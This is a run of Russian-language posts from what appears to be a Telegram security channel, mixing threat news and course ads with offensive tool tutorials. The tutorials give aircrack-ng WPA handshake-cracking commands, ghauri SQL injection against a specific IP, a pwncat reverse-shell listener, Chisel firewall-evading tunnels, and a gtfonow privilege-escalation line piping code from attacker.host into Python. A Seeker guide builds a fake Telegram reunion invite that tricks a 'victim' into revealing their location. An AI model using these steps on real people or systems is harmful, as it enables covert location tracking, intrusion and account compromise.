29 октября Apple выпустила критическое обновление безопасности для 90 своих сервисов и операционных систем, включая macOS, iOS, iPadOS, watchOS, tvOS и visionOS. Обновления также коснулись Safari и iTunes. Это обновление устраняет множество уязвимостей, которые могли поставить под угрозу конфиденциальность и безопасность пользователей.
Что нового?
🔸 macOS: Исправлены уязвимости, которые позволяли злоумышленникам получить доступ к контактам, конфиденциальным данным геолокации через сервис Find My и утечкам критических данных ядра. Некоторые из них также устраняли возможность атаки отказа в обслуживании (DoS) при открытии вредоносных изображений.
🔸 Safari: Закрыты дыры, позволявшие утечку истории просмотров в режиме Private Browsing.
🔸 iOS и iPadOS: Устранены баги, которые позволяли просматривать личные данные, даже если устройство заблокировано. Среди уязвимостей — проблема с Siri, из-за которой можно было просматривать фотографии контактов.
🔸 visionOS 2.1: Обновление включает исправления более чем 25 уязвимостей, некоторые из которых позволяли выполнение произвольного кода, доступ к конфиденциальной информации и даже полный сбой системы.
#новости
Что нового?
🗣️ Apple подчеркивает, что своевременное обновление ПО — это ключ к защите устройств и данных. Исследователи из таких компаний, как Trend Micro, CrowdStrike, Alibaba и JD.com, внесли значительный вклад в обнаружение и устранение этих уязвимостей.
#новости
Please open Telegram to view this post
VIEW IN TELEGRAM
👍11❤6🔥5
Aircrack-ng👩💻
Aircrack-ng - это инструмент, который используется для безопасности и взлома Wi-Fi сетей. Это всё в одном - сниффер пакетов, взломщик WEP и WPA/WPA2, инструмент анализа и инструмент захвата хэшей. Он помогает захватывать пакеты и считывать из них хэши и даже взламывать эти хэши с помощью различных атак, таких как атаки по словарю.
Может работать в 4 режимах:
Режим монитора - Мониторит передачу пакетов и захватывает их, пока не поймает определённый файл с хэшем.
Режим атаки - Создаёт поддельные точки доступа и выполняет деаунтификацию.
Режим тестировки - Проверка вашей сетевой карты на совместимость и исправность, относительно работы программы.
Режим взлома - взламывет WEP или WPA PSK.
🔸 Для вывода листа доступных сетевых интерфейсов, можно просто написать:
🔸 Можно остановить сетевой интерфейс:
🔸 И запустить на определённом канале:
🔸 Давайте попробуем украсть аутентификационное рукопожатие)):
🔸 А далее можно подобрать пароль с помощью aircrack-ng:
Aircrack-ng - это инструмент, который используется для безопасности и взлома Wi-Fi сетей. Это всё в одном - сниффер пакетов, взломщик WEP и WPA/WPA2, инструмент анализа и инструмент захвата хэшей. Он помогает захватывать пакеты и считывать из них хэши и даже взламывать эти хэши с помощью различных атак, таких как атаки по словарю.
Может работать в 4 режимах:
Режим монитора - Мониторит передачу пакетов и захватывает их, пока не поймает определённый файл с хэшем.
Режим атаки - Создаёт поддельные точки доступа и выполняет деаунтификацию.
Режим тестировки - Проверка вашей сетевой карты на совместимость и исправность, относительно работы программы.
Режим взлома - взламывет WEP или WPA PSK.
airmon-ng
airmon-ng stop <INTERFACE>
airmon-ng start <INTERFACE> <CHANNEL>
airodump-ng -c <CHANNEL> --bssid <BSSID> -w psk <INTERFACE>
aircrack-ng -w <PATH_T0_WORDLIST> <HANDSHAKE>
Please open Telegram to view this post
VIEW IN TELEGRAM
❤24👍13🔥6😁3💯1
Исследовательская группа Sysdig Threat Research Team (TRT) сообщает о глобальной атаке под кодовым названием Emeraldwhale, нацеленной на уязвимые Git-конфигурации. В результате этой операции злоумышленники похитили более 15,000 учетных данных для облачных сервисов, а также смогли клонировать более 10,000 приватных репозиториев.
⌛ Масштаб утечки
Украденные данные включают широкий спектр сервисов, от облачных провайдеров до почтовых платформ. Похищенные учетные данные активно используются в фишинговых и спам-кампаниях, а также продаются на подпольных рынках, где стоимость аккаунта может достигать сотен долларов.
⚙️ Инструменты и тактика атакующих
В ходе расследования Sysdig обнаружил, что злоумышленники использовали автоматизированные инструменты для поиска открытых Git-конфигураций и файлов .env, содержащих учетные данные. С помощью таких инструментов, как httpx и специализированных сканеров, Emeraldwhale смогли получать доступ к закрытым репозиториям и извлекать ключи для дальнейших атак.
🛡 Как защититься?
🔸 Периодически проверяйте конфигурации веб-сервисов на предмет ошибок.
🔸 Используйте системы мониторинга активности учетных записей.
🔸 Обучите сотрудников основам безопасности для предотвращения ошибок, приводящих к утечкам данных.
#новости
Украденные данные включают широкий спектр сервисов, от облачных провайдеров до почтовых платформ. Похищенные учетные данные активно используются в фишинговых и спам-кампаниях, а также продаются на подпольных рынках, где стоимость аккаунта может достигать сотен долларов.
В ходе расследования Sysdig обнаружил, что злоумышленники использовали автоматизированные инструменты для поиска открытых Git-конфигураций и файлов .env, содержащих учетные данные. С помощью таких инструментов, как httpx и специализированных сканеров, Emeraldwhale смогли получать доступ к закрытым репозиториям и извлекать ключи для дальнейших атак.
🗣️ Атака Emeraldwhale показала, что одних мер по защите секретов недостаточно — критически важно отслеживать действия всех учетных записей с доступом к конфиденциальной информации. В противном случае утечка данных может стать точкой входа для широкомасштабных атак.
#новости
Please open Telegram to view this post
VIEW IN TELEGRAM
👍13🔥7❤5
🚩 Новые задания на платформе Codeby Games!
🖼 Категория Стеганография — Тайна пикселей
🏆 Категория Квесты — Симпсоны
Приятного хакинга!
Приятного хакинга!
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥16👍7❤4🥰1🎉1
Seeker
Seeker - инструмент для определения точного местонахождения человека. Модель походит на фишинговую, жертве отправляется специальная ссылка по которой ей нужно перейти, затем он попадает на сайт и тогда нужно чтобы жертва разрешила доступ к геолокации в контекстном окошке браузера, если жертва не знает английский, это нам на руку.
Создаем фейковую страницу приглашения в беседу для telegram, название ей "Выпускники 11 "А".
🔸 Установка утилиты
🔸 Запуск
Далее заполняем шаблон и подкручиваем клиент, можно использовать ngrok, но будьте аккуратны,
🔸 Установка ngrok
🔸 Далее создаём аккаунт и регистрируем автотокен, его можно найти у себя на аккаунте
Отлично! Теперь командой ниже, запускаем клиент и можно отправлять ссылку любому человеку.
Seeker - инструмент для определения точного местонахождения человека. Модель походит на фишинговую, жертве отправляется специальная ссылка по которой ей нужно перейти, затем он попадает на сайт и тогда нужно чтобы жертва разрешила доступ к геолокации в контекстном окошке браузера, если жертва не знает английский, это нам на руку.
Создаем фейковую страницу приглашения в беседу для telegram, название ей "Выпускники 11 "А".
git clone https://github.com/thewhiteh4t/seeker
cd seeker/
python3 seeker.py
Далее заполняем шаблон и подкручиваем клиент, можно использовать ngrok, но будьте аккуратны,
ngrok строго относится к тому, что на нём запускают.
Скачиваем архив и командой разорхивируем его: sudo tar -xvzf ~/Downloads/ngrok.tgz -C /usr/local/bin
ngrok config add-authtoken <token>
Отлично! Теперь командой ниже, запускаем клиент и можно отправлять ссылку любому человеку.
ngrok http 8080
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
👍18❤9🔥5😁3😱1
Исследователи кибербезопасности обнаружили новую волну атак, в которых злоумышленники эксплуатируют API DocuSign для отправки поддельных счетов. В отличие от традиционного фишинга, здесь преступники создают подлинные аккаунты и используют шаблоны DocuSign, чтобы выдавать себя за известные бренды и обходить защитные фильтры 💱
👀 Новый уровень фишинга
Вместо поддельных писем с вредоносными ссылками, эти атаки используют реальные сервисы для создания доверия.
Злоумышленники отправляют такие счета напрямую через DocuSign, и они проходят проверку как подлинные, так как исходят с легитимного сервиса, не содержащего явных вредоносных ссылок.
✏️ Чтобы снизить риски, специалисты Wallarm рекомендуют:
🔸 Проверять отправителя и внимательно смотреть на подозрительные письма.
🔸 Вводить многоступенчатое подтверждение финансовых операций.
🔸 Обучать сотрудников распознавать поддельные счета.
🔸 Мониторить любые неожиданные транзакции.
Сторонние сервисы также должны применять ограничение на количество запросов к API и отслеживать аномалии в активности API.
🟢 API уязвимости
За последние месяцы пользователи DocuSign массово жалуются на мошеннические счета, указывая на высокую автоматизацию таких атак. Злоумышленники используют API DocuSign, чтобы отправлять поддельные счета в большом объеме. Wallarm предупреждает: удобство API дизайна — это и потенциальная лазейка для злоумышленников.
#новости
Вместо поддельных писем с вредоносными ссылками, эти атаки используют реальные сервисы для создания доверия.
🗣️ К примеру, как сообщает Wallarm, киберпреступники открывают платные аккаунты DocuSign и настраивают шаблоны для имитации счетов от компаний, таких как Norton Antivirus.
Злоумышленники отправляют такие счета напрямую через DocuSign, и они проходят проверку как подлинные, так как исходят с легитимного сервиса, не содержащего явных вредоносных ссылок.
Сторонние сервисы также должны применять ограничение на количество запросов к API и отслеживать аномалии в активности API.
За последние месяцы пользователи DocuSign массово жалуются на мошеннические счета, указывая на высокую автоматизацию таких атак. Злоумышленники используют API DocuSign, чтобы отправлять поддельные счета в большом объеме. Wallarm предупреждает: удобство API дизайна — это и потенциальная лазейка для злоумышленников.
#новости
Please open Telegram to view this post
VIEW IN TELEGRAM
👍13🔥6❤5
Растет тенденция использования кибергруппировками в атаках сертификатов с расширенной проверкой (EV). Основные злоупотребления включают использование кодовых подписей для обхода мер безопасности, получения привилегий и создания доверия у пользователей. Злоумышленники могут приобретать EV-сертификаты на теневых рынках за $2000-6000. Получение сертификатов возможно через создание фиктивных компаний или кражу подписей у реальных организаций, как это произошло с NVIDIA, которые затем использовались в реальных атаках. Это позволяет им подписывать вредоносное ПО и распространять его под видом легитимного.
Злоумышленники используют купленные электронные подписи для:
🔸Обхода антивирусных проверок и повышения доверия к их программам.
🔸Получения административных привилегий в операционных системах.
🔸Публикации вредоносного кода, который выглядит как подписанный легитимным разработчиком, что снижает подозрения у пользователей и систем безопасности
Чтобы снизить риски специалисты Intrinsec рекомендуют:
🔸 Строгие правила белого и черного списков приложений.
🔸 Тщательная проверка валидности сертификатов.
🔸 Проверка отзыва сертификатов.
🔸 Использование репутационной аналитики для обнаружения вредоносных сертификатов.
🔸 Применение техники песочниц и изоляции для неизвестных исполняемых файлов
Для блокировки недоверенных сертификатов в Windows используются следующие механизмы:
🔸Контроль доступа к сертификатам через Certificate Trust Lists (CTL), которые позволяют доверять только определенным сертификатам или блокировать недоверенные.
🔸 Групповые политики: через Group Policy можно настроить блокировку исполняемых файлов, подписанных недоверенными сертификатами.
🔸 SmartScreen: технология, которая проверяет цифровые подписи приложений и блокирует их, если сертификаты недоверенные или отозваны.
🔸 AppLocker: позволяет настроить правила для запуска только тех приложений, которые подписаны доверенными сертификатами.
Злоумышленники используют купленные электронные подписи для:
🔸Обхода антивирусных проверок и повышения доверия к их программам.
🔸Получения административных привилегий в операционных системах.
🔸Публикации вредоносного кода, который выглядит как подписанный легитимным разработчиком, что снижает подозрения у пользователей и систем безопасности
Чтобы снизить риски специалисты Intrinsec рекомендуют:
🔸 Строгие правила белого и черного списков приложений.
🔸 Тщательная проверка валидности сертификатов.
🔸 Проверка отзыва сертификатов.
🔸 Использование репутационной аналитики для обнаружения вредоносных сертификатов.
🔸 Применение техники песочниц и изоляции для неизвестных исполняемых файлов
Для блокировки недоверенных сертификатов в Windows используются следующие механизмы:
🔸Контроль доступа к сертификатам через Certificate Trust Lists (CTL), которые позволяют доверять только определенным сертификатам или блокировать недоверенные.
🔸 Групповые политики: через Group Policy можно настроить блокировку исполняемых файлов, подписанных недоверенными сертификатами.
🔸 SmartScreen: технология, которая проверяет цифровые подписи приложений и блокирует их, если сертификаты недоверенные или отозваны.
🔸 AppLocker: позволяет настроить правила для запуска только тех приложений, которые подписаны доверенными сертификатами.
🔥12❤9👍8
Внимание! До конца ноября у вас есть возможность купить курсы декабря по старым ценам*:
*С декабря стоимость курсов увеличится на 15%
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥16👍9❤7👎2
В новой статье мы покажем два подхода, которые используют OSINT-специалисты для сбора информации в VK. На примере реального кейса разберём, как можно получить максимум данных, начиная с простого никнейма или фотографии.
на обновленном курсе Академии здесь
Please open Telegram to view this post
VIEW IN TELEGRAM
👍15🔥7❤6🎉1
Расширение Hide YouTube Shorts для Chrome после смены владельца стало вредоносным. Вредоносный код был добавлен сразу после смены владельца. В результате чего, плагин начал заниматься мошенничеством с партнёрскими программами и отправлять псевдонимизированные данные пользователей на облачный сервер Amazon. Партнерское мошенничество направлено на генерацию прибыли, используя домен kra18[.]com, который заменяет ссылки на реферальные.
Список некоторых из затронутых популярных расширений:
⏺️ Hide YouTube Shorts
⏺️ Dynamics 365 Power Pane
⏺️ Karma | Online shopping, but better
⏺️ Visual Effects for Google Meet
⏺️ M3U8 Downloader
Расширения стали вредоносными после передачи прав в середине 2023 года. Особое внимание вызывает расширение Karma.
👀 Вредоносный код в расширениях не был обфусцирован или замаскирован. Каждая часть кода по отдельности выглядит довольно безобидно, но в совокупности внедрённые функции приводят к нелегитимным воздействиям.
❓ Зачем Karma Shopping нужны данные о пользователях?
Во-первых, партнёрские комиссии — это их основной вид деятельности и их целью является увеличение числа пользователей. Во-вторых, исходя из политики конфиденциальности компании, сбор данных о посещенных страницах является официальным и Karma утверждает, что продаёт эти данные третьим лицам, для более точного предоставления услуг пользователям.
⚙️ Несмотря на жалобы пользователей Google не реагирует.
Оповещение о проблеме происходит в формате заполнения формы, в которой причинами недовольства расширением служит «не соответствует ожиданиям» или «недружелюбное содержимое». Более точные и детализированные отзывы остаются без ответа.
#новости
Список некоторых из затронутых популярных расширений:
Расширения стали вредоносными после передачи прав в середине 2023 года. Особое внимание вызывает расширение Karma.
Во-первых, партнёрские комиссии — это их основной вид деятельности и их целью является увеличение числа пользователей. Во-вторых, исходя из политики конфиденциальности компании, сбор данных о посещенных страницах является официальным и Karma утверждает, что продаёт эти данные третьим лицам, для более точного предоставления услуг пользователям.
Оповещение о проблеме происходит в формате заполнения формы, в которой причинами недовольства расширением служит «не соответствует ожиданиям» или «недружелюбное содержимое». Более точные и детализированные отзывы остаются без ответа.
#новости
Please open Telegram to view this post
VIEW IN TELEGRAM
👍19❤8🔥8😱2
Поддерживаемые техники:
Boolean based
Error Based
Time Based
Stacked Queries
Поддерживаемые СУБД:
MySQL
Microsoft SQL Server
Postgres
Oracle
Поддерживаемые типы:
GET/POST
Headers
Cookies
Mulitipart Form data
JSON
SOAP/XML
Добавлена поддержка:
--sql-shell --proxygit clone https://github.com/r0oth3x49/ghauri.git
python3 -m pip install --upgrade -r requirements.txt
python3 setup.py install
ghauri -u 'http://62.173.140.174:16015/user.php?login=asd&password=asd' --batch -v 2 --dbs
Please open Telegram to view this post
VIEW IN TELEGRAM
👍25🔥9❤4✍3
pip3 install git+https://github.com/GreyDGL/PentestGPT
Для корректной работы нам понадобится ключ для доступа к API OpenAI
shell export OPENAI_API_KEY='<your key here>'
pentestgpt-connection
pentestgpt --reasoning_model=gpt-4-turbo
После всех проделанных шагов вы можете начать общение с дообученым помощником, который может самостоятельно проводить базовые проверки
Please open Telegram to view this post
VIEW IN TELEGRAM
❤35👍16🔥13🤯3😢1
Исследователи из CloudSEK выявили тревожное обновление в деятельности ботнета Androxgh0st: с начала 2024 года он нацелен на веб-серверы и активно эксплуатирует уязвимости в известных технологиях, таких как Cisco ASA, Atlassian JIRA и различные PHP-фреймворки.
Ключевые уязвимости, на которые нацелен Androxgh0st:
🔸 CVE-2017-9841 в PHPUnit, дающий бэкдор-доступ к вебсайтам
🔸 CVE-2018-15133 в Laravel, позволяющий выполнить зашифрованный код
🔸 CVE-2021-41773 в Apache, позволяющий атаки обхода путей
Mozi, ранее активно использовавший уязвимости в IoT-устройствах, таких как маршрутизаторы и DVR, был разгромлен в 2021 году. Однако Androxgh0st, судя по последним данным командных логов, внедрил Mozi-загрузки в свою инфраструктуру, что делает его ещё более опасным для IoT-среды.
#новости
🗣️ Недавний отчет показал, что Androxgh0st теперь использует компоненты от ботнета Mozi, расширяя своё влияние на устройства интернета вещей (IoT) и возможное сотрудничество между двумя ботнетами.
Ключевые уязвимости, на которые нацелен Androxgh0st:
Mozi, ранее активно использовавший уязвимости в IoT-устройствах, таких как маршрутизаторы и DVR, был разгромлен в 2021 году. Однако Androxgh0st, судя по последним данным командных логов, внедрил Mozi-загрузки в свою инфраструктуру, что делает его ещё более опасным для IoT-среды.
#новости
Please open Telegram to view this post
VIEW IN TELEGRAM
👍15❤6🔥6
This media is not supported in your browser
VIEW IN TELEGRAM
🚩 Новые задания на платформе Codeby Games!
🔑 Категория Криптография — Широковещание
🔎 Категория OSINT — Кого ищем?
Приятного хакинга!
Приятного хакинга!
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥17👍10❤6
Chisel — это многофункциональная утилита для создания защищенных туннелей TCP/UDP поверх HTTP и HTTPS. Если вам нужно обойти firewall или организовать безопасную точку доступа в сети, Chisel может стать отличным решением. В новой статье разберем подробнее этот инструмент.
🔍 Что такое Chisel и как это работает?
Chisel — это компактное приложение, объединяющее в себе клиент и сервер для туннелирования TCP и UDP трафика. Используя HTTP или HTTPS, Chisel проходит через firewall, маскируясь под стандартный веб-трафик и работая поверх WebSocket. Это позволяет обмениваться данными через часто разрешенные порты (80 или 443), делая трафик менее заметным для фильтров.
❓ Почему это трудно обнаружить?
Chisel отправляет данные в зашифрованных WebSocket фреймах через стандартные порты. Даже глубокая проверка пакетов (DPI) часто не видит, что внутри трафика, так как данные зашифрованы и выглядят как обычная HTTPS-сессия. Это помогает обойти ограничения сети, включая NAT и прокси.
⚙️ Практическое применение Chisel
Для того чтобы разобраться, как это работает, мы проведем небольшой эксперимент с сервером и клиентом на Linux, установим Chisel и настроим туннель. В конце анализа разберем захваченный трафик и посмотрим, как Chisel шифрует его на уровне фреймов.
➡️ Читать подробнее
Chisel — это компактное приложение, объединяющее в себе клиент и сервер для туннелирования TCP и UDP трафика. Используя HTTP или HTTPS, Chisel проходит через firewall, маскируясь под стандартный веб-трафик и работая поверх WebSocket. Это позволяет обмениваться данными через часто разрешенные порты (80 или 443), делая трафик менее заметным для фильтров.
Chisel отправляет данные в зашифрованных WebSocket фреймах через стандартные порты. Даже глубокая проверка пакетов (DPI) часто не видит, что внутри трафика, так как данные зашифрованы и выглядят как обычная HTTPS-сессия. Это помогает обойти ограничения сети, включая NAT и прокси.
Для того чтобы разобраться, как это работает, мы проведем небольшой эксперимент с сервером и клиентом на Linux, установим Chisel и настроим туннель. В конце анализа разберем захваченный трафик и посмотрим, как Chisel шифрует его на уровне фреймов.
Please open Telegram to view this post
VIEW IN TELEGRAM
2❤14🔥8👍6
Что не так с netcat ?
Пример классического подключения:
nc 1.1.1.1 4444
remote$ python -c "import pty; pty.spawn('/bin/bash')"
remote$ Ctrl + Z
local$ stty raw -echo
local$ fg
Установка:
python3 -m venv pwncat-env
source pwncat-env/bin/activate
pip install pwncat-cs
Основные опции:
# Connect to a bind shell
pwncat-cs 10.10.10.10:4444
# Listen for reverse shell
pwncat-cs -lp 4444
# Connect via ssh
pwncat-cs user@10.10.10.10
pwncat-cs user:password@10.10.10.10
pwncat-cs -i id_rsa user@10.10.10.10
# SSH w/ non-standard port
pwncat-cs -p 2222 user@10.10.10.10
pwncat-cs user@10.10.10.10:2222
# Reconnect utilizing installed persistence
# If reconnection fails and no protocol is specified,
# SSH is used as a fallback.
pwncat-cs reconnect://user@10.10.10.10
pwncat-cs reconnect://user@c228fc49e515628a0c13bdc4759a12bf
pwncat-cs user@10.10.10.10
pwncat-cs c228fc49e515628a0c13bdc4759a12bf
Табы работают, по Ctrl + C сессия не рвется.
Переключение между режимами(local <> remote) Ctrl + D
Есть полезные фичи как Upload с хоста на жертву, так и наоборот Download.
Модули escalate и enumerate для ленивых
run enumerate types=file.suid
run enumerate
Please open Telegram to view this post
VIEW IN TELEGRAM
2❤21👍12🔥7✍2🤩1
На форуме запустили лотерею, где можно выиграть любой курс Академии Кодебай, стартующий в декабре 2024 года. Как только будет разыграно 6 подписок на курс, лотерея будет остановлена. Розыгрыш каждые 3 дня до конца ноября 2024 года.
Нажмите "Купить билет" и выберите 7 цифр, после чего нажмите кнопку "Приобрести".
Быстро заработать на билет можно приглашая участников форума. За каждого реферала начисляем 25 BIT. Ссылка для приглашения находится у вас в профиле форума.
Нажмите "Купить билет" и выберите 7 цифр, после чего нажмите кнопку "Приобрести".
Быстро заработать на билет можно приглашая участников форума. За каждого реферала начисляем 25 BIT. Ссылка для приглашения находится у вас в профиле форума.
2👍18🔥7❤6
Авто повышение привилегий на .nix подобных системах используя мисконфигурации в setuid/setgid файлах, capabilities и sudo привилегиях.
Разработано специально для CTF, но может использоваться и в реальных условиях. Информацию берет с известного ресурса GTFO
Использование:
python gtfonow.py [OPTIONS]
python gtfonow.py --command 'ls -la' --level 2 --risk 2
curl http://attacker.host/gtfonow.py | python
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥18👍10❤5